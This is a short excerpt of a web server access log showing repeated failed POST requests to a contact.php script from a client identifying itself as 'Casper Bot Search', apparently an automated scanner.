174.142.68.135 - - [25/Jul/2010:19:20:49 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
174.142.68.135 - - [25/Jul/2010:19:20:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Casper Bot Search" "www.galf.org"
